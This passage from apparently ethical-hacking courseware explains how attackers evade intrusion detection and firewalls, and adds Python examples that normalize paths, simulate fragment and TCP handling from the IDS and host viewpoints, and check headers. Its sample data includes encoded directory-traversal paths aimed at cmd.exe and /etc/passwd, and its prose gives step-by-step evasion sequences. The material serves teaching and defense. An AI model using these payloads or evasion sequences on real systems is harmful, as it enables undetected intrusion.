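        if s[i] == "%" and re.fullmatch(r"[uU][0-9A-Fa-f]{4}", s[i + 1:i + 6]):
            out += chr(int(s[i + 2:i + 6], 16)).encode("utf-8", "surrogatepass")
            i += 6
        elif s[i] == "%" and re.fullmatch(r"[0-9A-Fa-f]{2}", s[i + 1:i + 3]):
            out.append(int(s[i + 1:i + 3], 16))
            i += 3
        else:
            out += s[i].encode("utf-8", "surrogatepass")
            i += 1
    return bytes(out)


def lenient_utf8_decode(data: bytes) -> str:
    """UTF-8 decode that ACCEPTS overlong sequences (e.g. C1 9C -> '\\').
    Python's own codec rightly rejects them; an IDS that wants the buggy
    server's view has to reproduce the bug on purpose."""
    out, i = [], 0
    while i < len(data):
        b = data[i]
        if b < 0x80:
            cp, n = b, 0
        elif 0xC0 <= b < 0xE0:
            cp, n = b & 0x1F, 1
        elif 0xE0 <= b < 0xF0:
            cp, n = b & 0x0F, 2
        elif 0xF0 <= b < 0xF8:
            cp, n = b & 0x07, 3
        else:
            out.append("\ufffd"); i += 1; continue
        tail = data[i + 1:i + 1 + n]
        if len(tail) < n or any(t & 0xC0 != 0x80 for t in tail):
            out.append("\ufffd"); i += 1; continue
        for t in tail:
            cp = (cp << 6) | (t & 0x3F)
        out.append(chr(cp) if cp <= 0x10FFFF else "\ufffd")
        i += 1 + n
    return "".join(out)


def normalize(path: str, rounds: int = 2) -> str:
    """Decode up to `rounds` layers of escaping (catches %25 double encoding),
    accept overlong UTF-8, apply NFKC, then fold look-alike separators."""
    text = path
    for _ in range(rounds):
        decoded = lenient_utf8_decode(percent_decode(text))
        if decoded == text:
            break
        text = decoded
    text = unicodedata.normalize("NFKC", text)
    return "".join(FOLD.get(ch, ch) for ch in text)


def match(path: str, normalized: bool) -> set:
    """Names of the signatures that fire on the raw or the normalized path."""
    target = normalize(path) if normalized else path
    return {name for name, rx in SIGNATURES.items() if rx.search(target)}


# Constructed sample paths; none is captured traffic.
SAMPLES = [
    "/cgi-bin/phf",
    "/cgi-bin/%70%68%66",
    "/cgi-bin/%2570hf",
    "/scripts/..%c1%9c..%c1%9cwinnt/system32/cmd.exe",
    "/..%u2215..%u2215etc/passwd",
]

if __name__ == "__main__":
    for p in SAMPLES:
        print(f"{p:50s} raw={match(p, False)!s:16s} normalized={match(p, True)}")
```

Only the first sample fires on raw bytes; all five fire after normalization. The same normalizer should be run on every layer the target decodes (URL, then UTF-8, then whatever the application does), since each layer is a fresh chance for the server and the IDS to disagree.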
Fragmentation Attack
IP packets must follow the standard Maximum Transmission Unit (MTU) size while traveling across the network. If the packet size is exceeded, it will be split into multiple fragments ("fragmentation"). The IP header of a fragment contains a fragment ID, fragment offset, fragment length, and fragmentation flags, among other fields, in addition to the original data. In a network, the flow of packets is irregular; hence, systems need to keep fragments around, wait for future fragments, and then reassemble them in order. Fragmentation can be used as an attack vector when fragmentation timeouts vary between the IDS and the host. Through the process of fragmenting and reassembling, attackers can send malicious packets over the network to exploit and attack systems. To avoid detection by an IDS, attackers may exploit fragmentation by using the fragment reassembly timeout, which varies from system to system.

Attack Scenario 1
If, for example, the fragment reassembly timeout is 10 s at the IDS and 20 s at the target system, attackers will send the second fragment 15 s after sending the first fragment. In this scenario, the IDS will drop the fragment on receiving the second fragment after its reassembly timeout, but the target host will reassemble the fragments. Attackers will continue sending fragments at intervals of 15 s until the attack payload is reassembled at the target system. Thus, the victim will reassemble the fragments and receive the attack code, whereas the IDS will not detect this or generate alerts, as the IDS drops the fragments.

Figure 12.36: Fragmentation attack scenarios

The figure above illustrates the discussed scenario (Attack Scenario 1). The attacker will successfully perform a fragmentation attack on a host. The attacker manipulates the order and timing of the fragments and sends those fragments to the victim machine. The attack will succeed when the NIDS fragmentation reassembly timeout is less than the victim's fragmentation reassembly timeout.

Attack Scenario 2
A similar fragmentation attack works when the IDS timeout exceeds that of the victim. Sometimes, the IDS fragmentation reassembly timeout is greater than that of a host. In this scenario, consider that the attacker has fragmented the attack packet into four fragments: frag-1, frag-2, frag-3, and frag-4. Here, the IDS fragmentation reassembly timeout is 60 s, and the fragmentation reassembly timeout for the host is 30 s. Initially, the attacker sends frag-2 and frag-4 with a false payload, referred to as frag-2' and frag-4', which are received by both the IDS and the victim. The attacker waits until the fragment reassembly timeout occurs at the victim's system. In this attack, the victim has not received frag-1, so it will drop the fragments without generating an ICMP error message. The attacker then sends frag-1 and frag-3 with a legitimate payload. Now, the victim has only frag-1 and frag-3, whereas the IDS has frag-1, frag-2', frag-3, and frag-4'. Here, frag-2' and frag-4' have false payloads. With the four received fragments, the IDS will perform a reassembly but drop the packet, as the computed checksum for frag-2' and frag-4' will be invalid. If the attacker now sends frag-2 and frag-4 again with a valid payload, the IDS will have only these two fragments with a valid payload, as the previous fragments will have been reassembled and dropped. The victim will have all fragments (frag-1, frag-3, frag-2, frag-4) with valid payloads, which it will reassemble and read as a valid packet.

The figure above illustrates the discussed scenario (Attack Scenario 2). The attacker sends a malicious payload that will falsely reassemble fragments at the IDS and successfully performs a fragmentation attack on a host when the NIDS fragmentation reassembly timeout exceeds the victim's fragmentation reassembly timeout.

Overlapping Fragments
Attackers use overlapping fragments to evade IDS. In this technique, attackers generate a series of tiny fragments with overlapping TCP sequence numbers. For example, the initial fragment consists of 100 bytes of payload with the sequence number of 1; the second fragment includes an overlapping sequence of 96 bytes, and so on. At the time of reassembling the packet, the destination host must know how to assemble the overlapping TCP fragments. Some OS will take the original fragments with a given offset (e.g., Windows W2K/XP/2003) and some OS will take the subsequent fragments with a given offset (e.g., Cisco IOS).
Consider a scenario in which the attacker carries out this attack by breaking the packet into four

Figure 12.38: Evading IDS using overlapping fragments
Time-To-Live Attacks
Each IP packet has a field called Time to Live (TTL), which indicates how many hops the packet can take before a network node discards it. Each router along a data path decrements this value by 1. When the TTL reaches 0, the packet is dropped, and an ICMP notification is sent to the sender. Typically, when a host sends a packet, it sets the TTL to a high value such that it can reach its destination under normal circumstances. Different OS use different default initial values for the TTL. Therefore, attackers can estimate the number of routers between them and a sending machine, make assumptions as to what the initial TTL was, and thereby guess which OS a host is running, as a prelude to an attack. To prevent such detection, SmartDefense can change the TTL field of all packets (or all outgoing packets) to a given number. These attacks require the attacker to have prior knowledge of the topology of the victim's network. This information can be obtained using tools such as traceroute, which gives information on the number of routers between the attacker and the victim.

Consider a scenario in which a router is present between the IDS and a victim. Attackers need to acquire this information before launching the TTL attack, in which the malicious data packet is broken into three fragments. It is assumed that the attacker has prior knowledge of the topology of the target network (i.e., how many routers there are between the attacker and victim machines). The attacker fragments the packet and sends frag-1 with the TTL set to a high value. It is then received by the victim and the IDS. Then, the attacker sends frag-2' with a false payload and a TTL value of 1, which is received by the IDS; however, the victim will not receive it, because the router discards it when the TTL value is reduced to 0. Next, the attacker sends frag-3 with a correct payload and a higher TTL value, which enables it to reach the IDS and the victim. After receiving frag-3, the IDS performs a reassembly on fragments 1, 2', and 3, while the victim waits for frag-2. Finally, the attacker sends frag-2 with a valid payload. The victim, after receiving frag-2, reassembles fragments 1, 2, and 3 and gets the attack code embedded in the malicious payload. Here, the IDS has only frag-2, as it has already reassembled the fragments and the stream has been cleared.

Figure 12.39: Evading IDS using Time-To-Live attack
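The Python below is an added example, not code from the courseware or from any IDS. One fragment reassembler is run from two vantage points, the NIDS and the victim host, to replay Attack Scenario 1 and Attack Scenario 2 of the fragmentation section and the TTL trick of this section. Assumptions made for illustration: the reassembly timer is an inactivity timer reset by every fragment (the reading under which the 15-second spacing in Scenario 1 works); a fragment's "valid" flag stands for a checksum that will verify; the victim sits behind exactly one router that decrements TTL; payloads are tiny strings.

```python
"""Fragment reassembly seen from the NIDS and from the victim: timeouts and TTL.

Added illustration, not part of the CEH courseware. Timer semantics, hop
counts and payloads are assumptions chosen to reproduce the text's scenarios.
"""
from dataclasses import dataclass

SIGNATURE = b"phf"


@dataclass
class Frag:
    fid: int           # IP identification shared by all fragments of one datagram
    index: int         # 1-based position of this fragment in the datagram
    total: int         # number of fragments in the datagram
    data: bytes
    valid: bool = True  # False: the checksum will not verify once reassembled
    ttl: int = 64


class Observer:
    """Fragment reassembly as seen from one vantage point (NIDS or victim)."""

    def __init__(self, name: str, timeout: float, hops_before: int):
        self.name, self.timeout, self.hops = name, timeout, hops_before
        self.pending = {}     # fid -> (time of last fragment, {index: Frag})
        self.assembled = []   # datagrams that completed and verified
        self.events = []

    def receive(self, t: float, f: Frag) -> None:
        if f.ttl <= self.hops:  # TTL reaches 0 at a router in front of us
            self.events.append(f"{self.name} t={t}: frag-{f.index} (TTL={f.ttl}) never arrives")
            return
        last, parts = self.pending.get(f.fid, (t, {}))
        if parts and t - last > self.timeout:
            self.events.append(f"{self.name} t={t}: timer expired, discarding {sorted(parts)}")
            parts = {}
        parts[f.index] = f
        self.pending[f.fid] = (t, parts)
        if len(parts) < f.total:
            return
        del self.pending[f.fid]
        payload = b"".join(parts[i].data for i in range(1, f.total + 1))
        if all(p.valid for p in parts.values()):
            self.assembled.append(payload)
            self.events.append(f"{self.name} t={t}: reassembled {payload!r}")
        else:
            self.events.append(f"{self.name} t={t}: checksum failed, datagram dropped")

    def alerted(self) -> bool:
        return any(SIGNATURE in p for p in self.assembled)


def deliver(observers, t: float, frag: Frag) -> None:
    for o in observers:
        o.receive(t, frag)


def scenario_short_ids_timeout():
    """Scenario 1: IDS timer 10 s, host timer 20 s, a fragment every 15 s."""
    ids, host = Observer("ids", 10, 0), Observer("host", 20, 1)
    for i, piece in enumerate((b"p", b"h", b"f"), start=1):
        deliver((ids, host), 15 * (i - 1), Frag(1, i, 3, piece))
    return ids, host


def scenario_long_ids_timeout():
    """Scenario 2: IDS timer 60 s, host timer 30 s, bogus frag-2'/frag-4' first."""
    ids, host = Observer("ids", 60, 0), Observer("host", 30, 1)
    obs = (ids, host)
    deliver(obs, 0, Frag(2, 2, 4, b"XX", valid=False))   # frag-2'
    deliver(obs, 0, Frag(2, 4, 4, b"XX", valid=False))   # frag-4'
    deliver(obs, 31, Frag(2, 1, 4, b"p"))                # host timer already expired
    deliver(obs, 31, Frag(2, 3, 4, b"f"))
    deliver(obs, 32, Frag(2, 2, 4, b"h"))                # genuine frag-2
    deliver(obs, 32, Frag(2, 4, 4, b"\n"))               # genuine frag-4
    return ids, host


def scenario_ttl():
    """TTL trick: frag-2' with TTL=1 dies at the router, so only the IDS sees it."""
    ids, host = Observer("ids", 60, 0), Observer("host", 60, 1)
    obs = (ids, host)
    deliver(obs, 0, Frag(3, 1, 3, b"p"))
    deliver(obs, 1, Frag(3, 2, 3, b"Z", ttl=1))   # frag-2': junk, reaches the IDS only
    deliver(obs, 2, Frag(3, 3, 3, b"f"))
    deliver(obs, 3, Frag(3, 2, 3, b"h"))          # genuine frag-2
    return ids, host


if __name__ == "__main__":
    for scenario in (scenario_short_ids_timeout, scenario_long_ids_timeout, scenario_ttl):
        ids, host = scenario()
        print(f"== {scenario.__doc__}")
        print("\n".join(ids.events + host.events))
        print(f"IDS alert: {ids.alerted()}   host got attack: {host.alerted()}")
```

In all three runs the host reassembles "phf" and the IDS never alerts, and in each case the cause is a parameter the IDS cannot know without being told: the target's timer, or the number of hops in front of it. Configuring the sensor with per-host timeouts and the hop distance to the protected segment (or dropping fragments whose TTL cannot reach the destination) is what closes these gaps.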
Invalid RST Packets
TCP uses 16-bit checksums for error checking of the header and data and to ensure that communication is reliable. It adds a checksum to every transmitted segment that is checked at the receiving end. When a checksum differs from the checksum expected by the receiving host, TCP drops the packet at the receiver's end. TCP also uses an RST packet to end two-way communications. Attackers can use this feature to elude detection by sending RST packets with an invalid checksum, which causes the IDS to stop processing the stream because the IDS thinks that the communication session has ended. However, the end host checks this packet, verifies the checksum value, and then drops the packet if it is invalid.

Some IDS might interpret this packet as an actual termination of the communication and stop reassembling the communication. Such instances allow attackers to continue to communicate with the end host while confusing the IDS, because the end host accepts the packets that follow the RST packet with an invalid checksum value.

Urgency Flag
The urgency flag in TCP marks data as urgent. TCP uses an urgency pointer that points to the beginning of urgent data within a packet. When the user sets the urgency flag, TCP ignores all data before the urgency pointer, and the data to which the urgency pointer points is processed. If the URG flag is set, TCP sets the Urgent Pointer field to a 16-bit offset value that points to the last byte of urgent data in the segment. Some IDS do not consider TCP's urgency feature and process all the packets in the traffic, whereas the target system processes only the urgent data. Attackers exploit this feature to evade the IDS, as seen in other evasion techniques. Attackers can place garbage data before the urgent data. The IDS reads that data without consideration of the end host's urgency flag handling. This means that the IDS has more data than the end host processes. This results in the IDS and the target systems having different sets of packets, which can be exploited by attackers to pass the attack traffic.

Example:
"When a TCP packet contains both urgent data and normal data, then 1 byte of data after the urgent data is lost"
Packet 1: XYZ
Packet 2: LMN Urgency Pointer: 3
Packet 3: PQR
End result: XYZLMNQR

The above example demonstrates the working of an urgency flag in a TCP packet. According to RFC 1122, if a TCP segment contains an urgency pointer, then one byte of data after the urgent data will be lost.

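The Python below is an added example, not code from the courseware or from any TCP stack or IDS. It serves both the Invalid RST Packets section and this Urgency Flag section: the same segment list is fed to a stream tracker written the naive way the text attributes to some IDS (trusts any RST, ignores URG) and to one written the way the text says an end host behaves (verifies the checksum before honouring an RST, honours the urgent pointer and loses the one byte after the urgent data). The segment layout, the checksum flag and the two sample exchanges (one of them the page's XYZ/LMN/PQR example) are constructed for illustration; the urgent-pointer semantics follow the page's description, not a particular stack.

```python
"""Invalid RST and URG handling: naive IDS stream tracker versus end-host behaviour.

Added illustration, not part of the CEH courseware. Segment fields are a
simplification; URG semantics are the page's model (byte after urgent data lost).
"""
from dataclasses import dataclass

SIGNATURE = b"phf"


@dataclass
class Segment:
    seq: int                 # stream offset of data[0]
    data: bytes = b""
    rst: bool = False
    urg_ptr: int = 0         # 0: URG clear; else offset of the last urgent byte (page's model)
    checksum_ok: bool = True  # stands in for a TCP checksum that verifies


def naive_ids(segments) -> bytes:
    """Stops tracking at the first RST regardless of checksum; ignores URG."""
    stream = bytearray()
    for s in segments:
        if s.rst:
            break
        stream += s.data
    return bytes(stream)


def end_host(segments) -> bytes:
    """Drops bad-checksum segments; a valid RST closes the connection;
    with URG set, the byte following the urgent data is discarded."""
    stream = bytearray()
    skip_pos = None           # absolute stream position of the byte to lose
    for s in segments:
        if not s.checksum_ok:
            continue          # silently discarded, as the text describes
        if s.rst:
            break
        if s.urg_ptr:
            skip_pos = s.seq + s.urg_ptr
        for i, byte in enumerate(s.data):
            if s.seq + i == skip_pos:
                continue
            stream.append(byte)
    return bytes(stream)


def rst_scenario():
    """A bogus RST (bad checksum) between two halves of the attack string."""
    segs = [
        Segment(0, b"GET /cgi-bin/ph"),
        Segment(15, rst=True, checksum_ok=False),   # IDS believes it, host does not
        Segment(15, b"f HTTP/1.0\r\n"),
    ]
    return naive_ids(segs), end_host(segs)


def urg_scenario():
    """The page's XYZ / LMN (URG pointer 3) / PQR example."""
    segs = [Segment(0, b"XYZ"), Segment(3, b"LMN", urg_ptr=3), Segment(6, b"PQR")]
    return naive_ids(segs), end_host(segs)


if __name__ == "__main__":
    for name, scenario in (("invalid RST", rst_scenario), ("urgency flag", urg_scenario)):
        ids_view, host_view = scenario()
        print(f"{name}: IDS sees {ids_view!r}, host sees {host_view!r}, "
              f"IDS alert={SIGNATURE in ids_view}, host got attack={SIGNATURE in host_view}")
```

Both divergences come from the IDS acting on a header field (RST, URG) with less care than the receiver will: it should verify the checksum before treating an RST as a teardown, and it should drop the same byte the target drops on URG, or at least match against both interpretations.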
Polymorphic Shellcode
A signature-based network intrusion detection system (NIDS) identifies an attack by matching attack signatures against incoming and outgoing data packets. Many IDS carry signatures for commonly used strings embedded in shellcode. Polymorphic shellcode attacks present a different byte pattern on every use, making it difficult to detect the signature. Attackers encode the payload using some technique and then place a decoder before the payload. As a result, the shellcode is completely rewritten each time it is sent, thereby evading detection.

With polymorphic shellcode, attackers hide their shellcode (attack code) by encrypting it with an unknown encryption algorithm and including the decryption code as part of the attack packet. To carry out polymorphic shellcode attacks, they use an existing buffer-overflow exploit and set the "return" memory address on the overflowed stack to the entry point of the decryption code. This makes it difficult for the IDS to identify it as shellcode. Therefore, when attackers modify or transform their attacks in this way, the NIDS cannot recognize them. This technique also evades commonly used shellcode strings, thus making shellcode signatures unusable.

ASCII Shellcode

ASCII shellcodes contain only characters from the ASCII standard. Such shellcodes allow attackers to bypass commonly enforced character restrictions within the string input code. They also help attackers bypass IDS pattern matching signatures because they hide strings similarly to polymorphic shellcodes. The IDS pattern matching mechanism does not work efficiently with ASCII values.

Using ASCII for shellcode is very restrictive in that it limits what the shellcode can do under some circumstances, as not all assembly instructions convert directly into ASCII values. This restriction is bypassed by using other instructions, or a combination of instructions, which convert to an ASCII character representation, serving the same purpose as those instructions that convert improperly.
An ASCII shellcode example is given below:

When executed, the shellcode above runs a "/bin/sh" shell. "bin" and "sh" are contained in the last few bytes of the shellcode.
Application-Layer Attacks

Media files such as images, audios, and videos can be compressed so that they can be rapidly transferred as smaller chunks. Attackers find flaws in this compressed data and perform attacks; even the IDS signatures cannot identify the attack code within data thus compressed.

Many applications that deal with such media files employ some form of compression to increase the data transfer speed. When you find a flaw in these applications, the entire attack can occur within the compressed data, and the IDS will have no way to check the compressed file format for signatures. This enables an attacker to exploit the vulnerabilities in the compressed data. Many IDSs look for specific conditions that allow for an attack. However, there are times when the attack can take many different forms. For example, attackers can exploit integer overflow vulnerabilities using several different integer values. This fact, combined with compressed data, makes signature detection extremely difficult.

Desynchronization

Pre-Connection SYN

This attack is performed by sending an initial SYN before the real connection is established, but with an invalid TCP checksum. The IDS can ignore or accept subsequent SYNs in a connection. If a SYN packet is received after the TCP control block is opened, the IDS resets the appropriate sequence number to match the newly received SYN packet. Attackers send fake SYN packets with a completely invalid sequence number to desynchronize the IDS. This stops the IDS from monitoring all legitimate and attack traffic. If the IDS is smart, it does not check the TCP checksum. If the IDS checks the checksum, the attack is synchronized and a bogus sequence number is sent to the IDS before the real connection occurs.

Post-Connection SYN

In this technique, attackers attempt to desynchronize the IDS from the actual sequence numbers that the kernel is honoring. Send a post-connection SYN packet in the data stream, which will have divergent sequence numbers but otherwise meet all the necessary criteria to be accepted by the target host. However, the target host will ignore this SYN packet, as it references an already established connection. This attack intends to get the IDS to resynchronize its notion of the sequence numbers to the new SYN packet. It will then ignore any data that is a legitimate part of the original stream because it will be waiting for a different sequence number. Once you succeed in resynchronizing the IDS with a SYN packet, send an RST packet with the new sequence number and close down its notion of the connection.

Other Types of Evasion

Encryption

Network-based intrusion detection analyzes traffic in the network from the source to the destination. If an attacker succeeds in establishing an encrypted session with his/her target host using a secure shell (SSH), secure socket layer (SSL), or virtual private network (VPN) tunnel, the IDS will not analyze the packets going through these encrypted communications. Thus, an attacker sends malicious traffic using such secure channels, thereby evading IDS security.

Flooding

IDSs use resources such as memory and processor speed to analyze the traffic going through them. To bypass IDS security, attackers flood IDS resources with noise or fake traffic to exhaust them with having to analyze flooded traffic. Once such attacks succeed, attackers send malicious traffic toward the target system behind the IDS, which offers little or no intervention. Thus, true attack traffic might go undetected.

Module Flow

Evading Firewalls

The previous section explained how attackers use various techniques to bypass IDS. Similarly, they can also use various tricks and techniques to bypass firewalls. This section discusses the different techniques used by attackers to bypass firewall security.

Firewall Evasion Techniques

Bypassing a firewall is a technique whereby an attacker manipulates the attack sequence to avoid being detected by the underlying firewall. The firewall operates on a predefined set of rules, and with thorough knowledge and skill, an attacker can bypass the firewall by employing various firewall bypassing techniques. Using these techniques, the attacker tricks the firewall into not filtering the malicious traffic generated by the attacker.

Some firewall bypassing techniques are as follows:

+ Port Scanning
+ Firewalking
+ Banner Grabbing
+ IP Address Spoofing
+ Source Routing
+ Tiny Fragments
+ Using an IP Address in Place of a URL
+ Using Anonymous Website Surfing Sites
+ Using a Proxy Server
+ ICMP Tunneling
+ ACK Tunneling
+ HTTP Tunneling
+ SSH Tunneling
+ DNS Tunneling
+ Through External Systems
+ Through MITM Attack
+ Through Content
+ Through XSS Attack

Firewall Identification

Port Scanning

Ports are points from which computers send or accept information from network resources. Port scanning is used to identify open ports and the services running on these ports. Finding open ports is an attacker's first step toward gaining access to the target system. To do so, the attacker systematically scans the target's ports to identify the versions of services, which helps in finding vulnerabilities in these services. Attackers sometimes use automated port-scanning utilities to do so, many of which are easily available.

How Attackers Scan Ports

Port scanning consists of sending messages to each port, one at a time. The kind of response received indicates whether the system is using the port, leaving it exposed to the discovery of weaknesses. Some firewalls will uniquely identify themselves using simple port scans. For example, Check Point's FireWall-1 listens on TCP ports 256, 257, 258, and 259, and Microsoft's Proxy Server usually listens on TCP ports 1080 and 1745.

Firewalking

Firewalking is a method of collecting information about remote networks behind firewalls. It is a technique that uses TTL values to determine gateway ACL filters and map networks by analyzing the IP packet response. It probes ACLs on packet filtering routers/firewalls using the same method as tracerouting. Firewalking involves sending TCP or UDP packets into the firewall where the TTL value is one hop greater than the targeted firewall. If the packet makes it through the gateway, the system forwards it to the next hop, where the TTL equals one, and prompts an ICMP error message at the

point of rejection with a "TTL exceeded in transit" message. This method helps locate a firewall; additional probing facilitates fingerprinting and identification of vulnerabilities.

Firewalk is a well-known application used for firewalking. It has two phases: a network discovery phase and a scanning phase. It comes with various open-source Linux distributions. Nmap has a firewalk script that can be used to perform firewalking.

Banner Grabbing

Banners are service announcements provided by services in response to connection requests, and they often carry vendor information. Banner grabbing is a simple method of fingerprinting that helps in detecting the vendor of a firewall and the firmware version. It identifies the service running on the system. Attackers use banner grabbing to fingerprint services and thus discover the services running on firewalls. The three primary services that send out banners are FTP, Telnet, and web servers.

A firewall does not block banner grabbing because the connection between the attacker's system and the target system appears legitimate. An example of SMTP banner grabbing is telnet mail.targetcompany.org 25. The syntax is "<service name> <service running> <port number>".

Banner grabbing is used for specifying banners and application information. For example, when the user opens a telnet connection to a known port on the target server and presses Enter a few times, if required, it displays the following result:

C:\>telnet www.corleone.com 80
HTTP/1.0 400 Bad Request
Server: Netscape Commerce/1.12

This system works with many other common applications that respond to a set port. The information generated through banner grabbing can boost the attacker's efforts to further compromise the system. With information about the version and the vendor of the web server, the attacker can further focus on employing platform-specific exploit techniques. Services on ports such as FTP, Telnet, and web servers should not remain open, as they are vulnerable to banner grabbing.

IP Address Spoofing

Most firewalls filter packets based on the source IP address. These firewalls examine the source IP address and determine whether the packet is coming from a legitimate source or an illegitimate source. The IDS filters packets from illegitimate sources. Attackers use the IP spoofing technique to bypass such firewalls.

IP address spoofing is a hijacking technique in which an attacker masquerades as a trusted host to conceal his identity, spoof a website, hijack browsers, or gain unauthorized access to a network. In IP spoofing, the attacker creates IP packets by using a forged IP address and gains access to the system or network without authorization. Attackers modify the addressing information in the IP packet header and the source address bits field to bypass the firewall. The attacker spoofs the message; therefore, the destination host thinks that it has come from a reliable source. Thus, the attacker succeeds in impersonating others with the help of IP spoofing. Hackers use this technique to avoid detection during spamming and various other activities.

For example, let us consider three hosts: A, B, and C. Host C is a trusted machine of host B. Host A masquerades as host C by modifying the IP address of the malicious packets that it intends to send to host B. When the packets are received, host B thinks that they are from host C, but they are actually from host A.

Figure 12.40: Evading Firewall using IP Address Spoofing (Host B, destination address 10.0.0.1, receives packets carrying source address 10.0.0.2, the address of Host C, the trusted machine)

Source Routing

Using this technique, the sender of the packet designates the route (partially or entirely) that a packet should take through the network such that the designated route should bypass the firewall node. Thus, the attacker can evade firewall restrictions.

When these packets travel through the network nodes, each router examines the destination IP address and chooses the next hop to direct the packet to the destination. In source routing, the sender makes some or all of these decisions on the router.

Source routing is categorized into two approaches: loose source routing and strict source routing. In loose source routing, the sender specifies one or more stages that the packet must go through, whereas in strict source routing, the sender specifies the exact route the packet must go through.

The figure below shows source routing, where the originator dictates the eventual route of the traffic.

Figure: Evading Firewall using Source Routing

Tiny Fragments

Attackers create tiny fragments of outgoing packets, forcing some of the TCP packet's header information into the next fragment. The IDS filter rules that specify patterns will not match with the fragmented packets owing to the broken header information. The attack will succeed if the filtering router examines only the first fragment and allows all the other fragments to pass through. This attack is used to avoid user-defined filtering rules and works when the firewall checks only for the TCP header information.
Figure 12.42: TCP header format (Fragment 1, Offset=0: Source Port, Destination Port, Sequence Number, Acknowledgement Sequence Number, Data Offset, Reserved, Window, Checksum, Urgent Pointer=0)
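An added example (not courseware code) of the inbound IPv4 header checks a filtering device can apply against the three techniques above (IP address spoofing, source routing and tiny fragments): it rejects source-route options, an internal source address arriving on the external interface, and TCP fragments too small or too oddly placed to carry an intact header per RFC 1858. The TMIN value, the site prefix and the sample packets are assumptions.

```python
"""Added example (not courseware code): inbound IPv4 header checks for
source-route options, spoofed internal source addresses and RFC 1858
tiny-fragment rules. TMIN, INTERNAL_NETS and the samples are assumptions."""
import ipaddress
import struct
from typing import List

IPPROTO_TCP = 6
OPT_EOL, OPT_NOP = 0, 1
OPT_LSRR, OPT_SSRR = 131, 137   # loose / strict source route option types (RFC 791)
TMIN = 16                       # assumed minimum first-fragment transport length (RFC 1858)
INTERNAL_NETS = [ipaddress.ip_network("10.0.0.0/8")]   # constructed site prefix


def parse_ipv4(pkt: bytes) -> dict:
    """Decode the fixed header and return the fields the checks need."""
    if len(pkt) < 20:
        raise ValueError("truncated IPv4 header")
    ver_ihl, _tos, total_len, _id, flags_frag, _ttl, proto, _csum, src, _dst = \
        struct.unpack("!BBHHHBBH4s4s", pkt[:20])
    ihl = (ver_ihl & 0x0F) * 4
    if ver_ihl >> 4 != 4 or ihl < 20 or len(pkt) < ihl:
        raise ValueError("malformed IPv4 header")
    return {"ihl": ihl, "total_len": total_len, "proto": proto,
            "mf": bool(flags_frag & 0x2000), "frag_off": flags_frag & 0x1FFF,
            "options": pkt[20:ihl], "src": ipaddress.ip_address(src)}


def option_types(options: bytes) -> List[int]:
    """Walk the option list; a truncated or bad-length option is reported as -1."""
    types, i = [], 0
    while i < len(options):
        t = options[i]
        if t == OPT_EOL:
            break
        types.append(t)
        if t == OPT_NOP:
            i += 1
            continue
        if i + 1 >= len(options) or options[i + 1] < 2:
            types.append(-1)
            break
        i += options[i + 1]
    return types


def inspect(pkt: bytes, iface: str = "external") -> List[str]:
    """Return the drop reasons for one packet (empty list means pass)."""
    hdr = parse_ipv4(pkt)
    reasons = []
    opts = option_types(hdr["options"])
    if OPT_LSRR in opts:
        reasons.append("loose source route option")
    if OPT_SSRR in opts:
        reasons.append("strict source route option")
    if -1 in opts:
        reasons.append("malformed option list")
    if iface == "external" and any(hdr["src"] in net for net in INTERNAL_NETS):
        reasons.append("internal source address on external interface")
    if hdr["proto"] == IPPROTO_TCP:
        transport_len = hdr["total_len"] - hdr["ihl"]
        # RFC 1858 direct method: a first fragment too short to hold the TCP
        # flags field (an unfragmented TCP packet this short is malformed too).
        if hdr["frag_off"] == 0 and transport_len < TMIN:
            reasons.append("tiny first fragment")
        # RFC 1858 indirect method: offset 1 can only overlap a first fragment's TCP header.
        if hdr["frag_off"] == 1:
            reasons.append("fragment at offset 1")
    return reasons


def build_ipv4(payload: bytes, src: str, proto: int = IPPROTO_TCP, frag_off: int = 0,
               mf: bool = False, options: bytes = b"") -> bytes:
    """Constructed sample packets for the checks above (header checksum left zero)."""
    options += b"\x00" * (-len(options) % 4)        # pad the option list to a 32-bit boundary
    ihl = 20 + len(options)
    flags_frag = (0x2000 if mf else 0) | (frag_off & 0x1FFF)
    hdr = struct.pack("!BBHHHBBH4s4s", 0x40 | (ihl // 4), 0, ihl + len(payload), 1,
                      flags_frag, 64, proto, 0, ipaddress.ip_address(src).packed,
                      ipaddress.ip_address("203.0.113.10").packed)
    return hdr + options + payload


SAMPLES = {   # constructed traffic arriving on the external interface
    "normal": build_ipv4(b"\x00" * 20, "198.51.100.7"),
    "spoofed": build_ipv4(b"\x00" * 20, "10.0.0.2"),
    "lsrr": build_ipv4(b"\x00" * 20, "198.51.100.7",
                       options=bytes([OPT_LSRR, 7, 4, 198, 51, 100, 9])),
    "tiny_first": build_ipv4(b"\x00" * 8, "198.51.100.7", mf=True),
    "offset_one": build_ipv4(b"\x00" * 8, "198.51.100.7", frag_off=1),
}
```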

Bypass Blocked Sites Using an IP Address in Place of a URL

This method involves typing a blocked website's IP address directly in the browser's address bar instead of the domain name. For example, to access Facebook, type its IP address instead of typing its domain name. Use services such as Host2ip to find the IP address of the blocked website. This method fails if the blocking software tracks the IP address sent to the web server.

Figure: Bypass blocked sites using the IP address instead of the URL

Bypass Blocked Sites Using Anonymous Website Surfing Sites

Anonymous web-surfing sites help to browse the Internet anonymously and unblock blocked sites (i.e., evade firewall restrictions). By using these sites, you can surf restricted sites anonymously without revealing your IP address. Various anonymous web-surfing sites are available, some of which provide options to encrypt website URLs.

The following is the list of proxy servers that can help you to access blocked websites. These proxy websites will hide the actual IP address and show another IP address, which could prevent the website from being blocked, thereby allowing access.

Anonymizer

Source: https://www.anonymizer.com

Anonymizer's VPN routes all the traffic through an encrypted tunnel directly from your laptop to secure and hardened servers and networks. It then masks the real IP address to ensure complete and continuous anonymity for all online activities.

Some online anonymizers include:

= https://www.free-proxy.com
= http://anonymouse.org
= https://anonymous-proxy-servers.net
= https://www.boomproxy.com
= http://www.anype.com
= https://zendproxy.com
= https://www.spysurfing.com
= https://proxify.com
= http://www.guardster.com

Bypass a Firewall Using a Proxy Server

Steps to be followed to bypass a firewall using a proxy server:

1. Find an appropriate proxy server.
2. In the Tools menu of any Internet browser, go to "Proxy Settings," and in the Internet Properties dialog box under the Connections tab, click "LAN settings".
3. Under LAN Settings, click on the "Use a proxy server for your LAN" checkbox.
4. In the Address box, type the IP address of the proxy server.
5. In the Port box, type the port number that is used by the proxy server for client connections (by default, 8080).
6. Click to select the "Bypass proxy server for local addresses" checkbox if you do not want the proxy server computer to be used when connected to a computer on the local network.
7. Click OK to close the LAN Settings dialog box.
8. Click OK again to close the Internet Properties dialog box.

Bypassing Firewalls through the ICMP Tunneling Method

